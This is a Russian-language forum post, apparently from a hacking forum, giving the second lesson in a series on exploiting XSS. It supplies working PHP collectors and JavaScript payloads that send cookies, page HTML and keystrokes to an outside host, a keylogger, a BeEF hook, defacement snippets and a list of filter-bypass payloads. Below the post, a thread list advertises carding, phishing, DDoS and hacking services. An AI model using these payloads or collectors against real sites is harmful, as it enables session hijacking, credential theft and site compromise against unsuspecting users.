Уроки по XSS: Урок 2. Скрытая передача данных, перехват нажатия клавиш, изменение внешнего вида сайта, подцепление на BeEF, фишинг, подсказки обхода ф

klobald

Original poster
Pro Member
Сообщения
134
Реакции
123
Посетить сайт
Кража данных с помощью XSS и их передача на удалённый сервер
Это самый популярный вариант эксплуатации XSS. Кроме уязвимости XSS на целевом веб-сайте, нам нужен свой сервер, на который будут отправляться данные. В качестве уязвимых сайтов я буду использовать различные веб-приложения из Web Security Dojo. В качестве сервера, который будет собирать данные, я буду использовать один из своих хостингов (для обучения можете описанное здесь проделывать на localhost’е, или поискать любой бесплатный хостинг с PHP, или просто купить

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

.

Для приёма и показа данных я буду использовать следующий код:
Код:
<?php

 

#error_reporting(0);

 

$filename = 'log.txt';

$password = 'pass';

 

if (!file_exists($filename)) {

    if ($fh = fopen($filename, 'w')) {

        fclose($fh);

    }

}

 

if (isset($_GET['c'])) {

    $content = '[Host]: ' . $_SERVER['REMOTE_HOST'] . PHP_EOL;

    $content .= '[Remote Addr]: ' . $_SERVER['REMOTE_ADDR'] . PHP_EOL;

    $content .= '[Sensitive Information]: ' . $_GET['c'] . PHP_EOL;

    $content .= PHP_EOL . PHP_EOL;

    file_put_contents($filename, $content, FILE_APPEND | LOCK_EX);

}

 

if (isset($_GET['p'])) {

 

    if ($_GET['p'] == $password) {

        if (isset($_GET['rm'])) {

            unlink($filename);

        } else {

            $data = file_get_contents($filename);

            $convert = explode("\n", $data);

            for ($i = 0; $i < count($convert); $i++) {

                echo $convert[$i] . '</br>';

            }

        }

    }

}

Я сохранил его в файл stealer.php, вы можете выбрать любое название – но тогда не забывайте его менять в соответствующем коде JavaScript.

В строках
Код:
$filename = 'log.txt';

$password = 'pass';

Устанавливаются файл для хранения данных и пароль (pass).

Для передачи данных используется переменная c, например:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

данные


Для просмотра полученных данных:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.



Для очистки файла с захваченными данными:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.



Уязвимость мы будем эксплуатировать в приложении

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.



Сборщик данных я разместил по адресу

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.



Таким образом, внедряемый код имеет следующий вид (вам нужно заменить miloserdov.org на адрес своего домена или IP):
Код:
<script>new Image().src="http://miloserdov.org/stealer.php?c="+encodeURI(document.cookie);</script>

Размещаем:

303.jpg

Получаем результат:

304.jpg

Можно украсть весь HTML код:
Код:
<script>new Image().src=" http://miloserdov.org/stealer.php?c="+encodeURI(document.body.innerHTML);</script>


Или отдельные элементы:
Код:
<script>new Image().src=" http://miloserdov.org/stealer.php?c="+encodeURI(document.getElementById('idSystemInformationHeading').innerHTML));</script>

Кража HTML кода имеет смысл тогда, когда целевой пользователь видит на странице то, что вам недоступно.


Изменение внешнего вида сайта при помощи XSS
Подобным образом можно оставить веб-сайт без содержимого:
Код:
<script>document.body.innerHTML=""</script>

305.jpg

А так без содержимого будет только выбранный элемент:
Код:
<script>document.getElementById('idSystemInformationHeading').innerHTML=""</script>


Можно поменять содержимое сайта на своё:
Код:
<script>document.body.innerHTML="<p>Ещё один сайт о всякой фигне.</p>"</script>

306.jpg

Добавить что-то от себя:
Код:
<script>document.body.innerHTML=document.body.innerHTML+"<p>One more shitty web site.</p>"</script>


307.jpg

И делать что-угодно со стилями.


Внедрение перехватчика нажатий клавиш при XSS (килогер)
Добавление килогера (программы, которая записывает все нажатые пользователем клавиши) наиболее перспективно при хранимой уязвимости XSS. Хотя и при непостоянных XSS килогер может сделать своё дело.

Будут перехватываться все нажатые клавиши, в том числе введённые логины и пароли.

На сервере атакующего нужно создать 2 файла. Первый из них содержит JavaScript код и его роль заключается в захвате и отправке введённых данных. Второй файл на PHP, он отвечает за приём и сохранение перехваченных данных:

Исходный код exploit.js:
Код:
var keys = '';

document.onkeypress = function (e) {

    var get = window.event ? event : e;

    var key = get.keyCode ? get.keyCode : get.charCode;

    key = String.fromCharCode(key);

    keys += key;

};

window.setInterval(function () {

    new Image().src = 'http://miloserdov.org/exploit.php?keylog=' + keys;

    keys = '';

}, 1000);

Обратите внимание на строку:
Код:
new Image().src = 'http://miloserdov.org/exploit.php?keylog=' + keys;



Вместо miloserdov.org вам нужно ввести адрес хоста или IP, куда будут пересылаться перехваченные нажатия клавиш.

Второй файл exploit.php:
Код:
<?php



$password = 'pass';

 

if (!file_exists('keylog.txt')) {

    if ($fh = fopen('keylog.txt', 'w')) {

        fclose($fh);

    }

}

 

if (!empty($_GET['keylog'])) {

    $logfile = fopen('keylog.txt', 'a+');

    fwrite($logfile, $_GET['keylog']);

    fclose($logfile);

}

 

if (isset($_GET['p'])) {

 

    if ($_GET['p'] == $password) {

        if (isset($_GET['rm'])) {

            unlink('keylog.txt');

        } else {

            $data = file_get_contents('keylog.txt');

            $convert = explode("\n", $data);

            for ($i = 0; $i < count($convert); $i++) {

                echo $convert[$i] . '</br>';

            }

        }

    }

}

В нём можно ничего не менять – разве пароль установите на свой.

В сайте с имеющейся хранимой XSS мы вводим:
Код:
<script src="http://miloserdov.org/exploit.js"></script>


Обратите внимание на адрес –

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

– вам нужно заменить его на свой.

Вводим:

401.jpg



Просматриваем результат:

402.jpg



Подцепление на BeEF
Браузер является подцепленным на BeEF, если в страницу веб-сайта, которую просматривает пользователь, удалось внедрить специальный JavaScript код. XSS как раз подходят для этих целей.

Атакующий запускает BeEF на своём сервере:
Код:
sudo beef

BeEF даёт подсказку, какой файл нужно внедрять в код:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.



Наш код, который мы вставляем в сайт, уязвимый к XSS:
Код:
<script src="http://192.168.1.39:3000/hook.js">


Внедняем:

501.jpg

Когда кто-то посещает страницу с нашим кодом, мы видим это в панели управления BeEF:

502.jpg

Выполняем разные атаки:

503.jpg

504.jpg



Подсказки по эксплуатации XSS и обходу фильтров
Здесь собраны некоторые примеры, которые могут помочь вам обойти XSS фильтры, это может оказаться полезным в различных контекстах и может помочь вам в выполнении XSS.

Базовая полезная нагрузка XSS:
Код:
<script>alert("XSS-by-Shawar")</script>

"><script>alert("XSS-by-Shawar")</script>

"><script>alert(/XSS-by-Shawar/)</script>

Внутри тэга Script:
</script><script>alert("XSS by Shawar")</script>

");alert("xss-by-shawar");//

Обход ограничения тэга script путём замены регистра:
Код:
"><iFrAmE/src=jAvAscrIpT:alert(/xss-by-shawar/)>

"><ScRiPt>alert("xss by shawar")</sCrIpT>

XSS с использованием тэгов Image и HTML:

Работает только в Chrome
Код:
"><detials ontoggle=confirm(0)>

"><IMG SRC=x onerror=javascript:alert(&quot;XSS-by-Shawar&quot;)>

"><img onmouseover=alert(“XSS by Shawar”)>

"><test onclick=alert(/xss-by-shawar/)>clickme</test>

"><a href=javascript:alert(/xss-by-shawar/)clickme</a>

"><h1 onmouseover=alert("XSS by Shawar Khan")> hover on me</h1>

"><svg/onload=prompt("XSS by Shawar Khan")>

"><body/onload=alert("XSS by shawar")>

В контексте стилей (работает только на старых версиях IE,, например IE 8, IE 7)

Если input внутри тэга <style>:
Код:
body{xss:expression(alert("XSS by Shawar Khan"))}


Если input внутри атрибута style=" ":
Код:
xss:expression(alert(/xss-by-shawar/)


Обход фильтрации тэга script:
Код:
<<SCRIPT>alert("XSS by Shawar");//<</SCRIPT>

%253script%253ealert(/xss-by-shawar/)%253c/script%253e

"><s"%2b”cript>alert(/xss-by-shawar/)</script>

foo<script>alert(/xss-by-shawar/)</script>

<scr<script>ipt>alert(/xss-by-shawar/)</scr</script>ipt>

Продвинутая полезная нагрузка:
Код:
"><IMG SRC=x onerror=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

"><a XSS-test href=jAvAsCrIpT&colon;prompt&lpar;/XSS-by-Shawar/&rpar;>ClickMe

"><h1/onclick=au006ceru0074(/xss-by-shawar/)>clickme</h1>

"><a id="a"href=javascript&colon;au006ceru0074&lpar;/xss-by-shawar/&rpar; id="xss-test">Click me</a>#a <

<a href="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+">clickme

Некоторые альтернативы полезных ключевых слов:
Код:
alert = au006ceru0074

prompt = pu0072omu0070u0074

confirm = cou006efiru006d

javascript = j&#x00041vascr&#x00069pt

: = &colon;

( = &lpar;

) = &rpar;

использование alert(/xss/) в ссылке = alert%28 /xss/%29 example: <a href="javascript:alert%28 /xss/%29">clickme

base64 alert(2) = data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+


Следующий урок скоро будет
P.s: И даже не думай использовать этот урок что бы хацкнуть hhide.su:D
P.p.s: Все равно ничего не получится)
 
  • Like
Реакции: Forevonly
Название темы
Автор Заголовок Раздел Ответы Дата
klobald Уроки по XSS: Урок 3. Контексты внедрения XSS Уязвимости и взлом 0
klobald Уроки по XSS: Урок 1. Основы XSS и поиск уязвимых к XSS сайтов Уязвимости и взлом 0
Файт Уроки по C# .NET 2
P Видео-Уроки по С# Полезные статьи 8
Olie Уроки по HTML & CSS Другие ЯП 1
Levine Куплю Ключи TF2 по вашей цене. Куплю/Обменяю 0
MrMinister Продам Продажа карж CC под ФБ, ГУГЛ и другие цели, выборка по любым бинам - трафик с гугла Карты/CC/Банки/Enroll 0
thelulz Авто Бот по продаже Facebook и Gpay. Аккаунты/Админки/Документы 0
Kapusta_support Продам Kapusta.World - Создание банковский счетов, криптобирж, электронных кошельков и многое другое по USA. Карты/CC/Банки/Enroll 0
P Рассылка сообщений по вашей ЦА в Telegram. Добавление контактов в чаты и группы. Спам, рассылки, трафик, SEO 0
T Куплю В поиске селлера по логам FB Куплю/Обменяю 0
Vellis На проверке Vellis - сервис по внедрению вашей рекламы в форумную жизнь. Ищу работу. Предлагаю свои услуги. 1
prizrak11 Куплю Выкупим лиды на потребительские кредиты по РФ Куплю/Обменяю 1
Dharma_Service На проверке Услуги по рекламе | размещение ваших тем/топиков на тематических форумах Ищу работу. Предлагаю свои услуги. 1
D Продам Все шаблоны документов с Трампом и Уиком по самой низкой цене; обучение отрисовке, фотодропы, биллы, софт для баркодов USA Услуги дизайнеров/веб-разработчиков 5
Khan Проверено «KHAN Service» Пробив / поиск и сбор любой информации по РФ и Украине (Государственный / Мобильный / СДЭК). Комплексное решение задач Пробив информации/Прозвоны 0
NikitaKit На проверке Базы/проекты по сочным ценам Все что не подошло по разделу 1
quillton Интересно Создаем Telegram-бота по продаже виртуальных номеров. Обучения, схемы, мануалы 0
P Закрыто Premiumexchanger.com - услуги гаранта, продажа и покупка обменников, консультации по созданию обменника Корзина 1
A Продам Процессим СКАМ платежи по Европе и не только... Трафик, загрузки, инсталлы, iframe 1
A Предлагаю работу по всем РФ и РБ Ищу работу. Предлагаю свои услуги. 0
GetLeads На проверке Провожу обучение по работе с Телеграм Ищу работу. Предлагаю свои услуги. 1
W Заказать услуги Хакера,Доступ до БД сайтов,Взлом Сайтов,Взлом на заказ от [email protected] -решение проблем по взлому. Корзина 0
quillton Курс по Kali Linux Kali Linux 0
quillton Пособие по кардингу Раздача сс, ба и всего что связано с кардингом 2
E Exmymoney.com - Сервис по обмену криптовалюты онлайн Обменники 58
H Продам Cервис по размещению в сети ресурсов нестандартного содержания. Сайты/Хостинг/Сервера 1
Ёшкин_кот База для спам рассылки по e-mail (mix) Другое 2
Kashtan4ik Куплю Куплю аккаунты coinlist по ссылке,готовые(от1900р) Куплю/Обменяю 0
B Прибыльная ниша по созданию контента для западного зрителя Способы заработка 0
C Партнёрка по Crypto Phishing Serivce Предоставляю работу. Ищу специалиста. 1
YoungKitty Автоматический БОТ по продаже саморегов VCC / БА / Paypal и др. Аккаунты/Админки/Документы 1
Denik Интересно ФСБ сообщило, что члены хак-группы REvil арестованы по запросу США Новости в сети 2
HostingSupport !!АКЦИЯ!!! СКУПАЮ AZURE по 5000 RUB Финансы - биллинги, банки, кошельки, логи 0
nord_man Автоматический сервис по продаже сканов/фото документов Аккаунты/Админки/Документы 5
Senemany Куплю Бот по скупу TELEGRAM | От 5-7₽ | TDATA - папка из логов Куплю/Обменяю 0
fx7support Партнерка «Секс по телефону по предоплате» или «обратный звонок» Способы заработка 1
Jinaktiv Услуги по чекингу номеров авито Ищу работу. Предлагаю свои услуги. 0
buy_accounts_org Продам Качественные аккаунты соцсетей, мобильные прокси по лучшим ценам - BUY-ACCOUNTS.ORG Аккаунты/Админки/Документы 0
Khan Проверено «KHAN Service» Комплексный пробив и сбор информации по всем базам Украины Пробив информации/Прозвоны 1
119emperor 》DDOS аТаки《 услуги по временному отключению сайтов. Ищу работу. Предлагаю свои услуги. 0
Kalash Интересно Возьму на обучению по PayPal Предоставляю работу. Ищу специалиста. 0
A Обмен криптовалюты на наличные и онлайн по всему миру all24.cc Обменники 26
bobanuk Нужна база по городам миллионикам с гео данными Вопросы и интересы 0
HostingSupport Куплю Куплю логи по данным сервисам AZURE, RACKSPACE, HETZNER, LINODE, IONOS, AWS Amazon,и др Куплю/Обменяю 0
Data_UA Халявный бот для пробива по номеру телефона Другое 1
st.ap Схема по заработку на конвертации трафика из ютуба на кинопартнёрку. Способы заработка 1
K предлагаю работу по регистрации акк Предоставляю работу. Ищу специалиста. 1
Y в поисках врачей по украине Предоставляю работу. Ищу специалиста. 0
L Продам lacost.net - гипермаркет аккаунтов соц сетей, почтовых и других сервисов. Купить аккаунты вк, инстаграм, фейсбук и др. соц сети по приемлемым ценам. Аккаунты/Админки/Документы 1

Название темы